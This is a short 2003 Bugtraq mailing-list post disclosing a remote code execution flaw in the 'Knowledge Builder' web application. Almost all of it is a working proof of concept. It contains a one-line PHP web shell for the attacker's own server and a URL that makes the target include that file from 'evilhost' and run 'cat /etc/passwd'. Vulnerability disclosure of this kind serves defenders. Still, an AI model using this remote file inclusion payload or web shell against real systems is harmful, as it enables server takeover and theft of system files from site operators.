Date: 24 Dec 2003 13:45:22 -0000
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Subject: Remote Code Execution in Knowledge Builder.
Remote Code Execution in Knowledge Builder.
"Knowledge Builder" from www.activecampaign.com allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
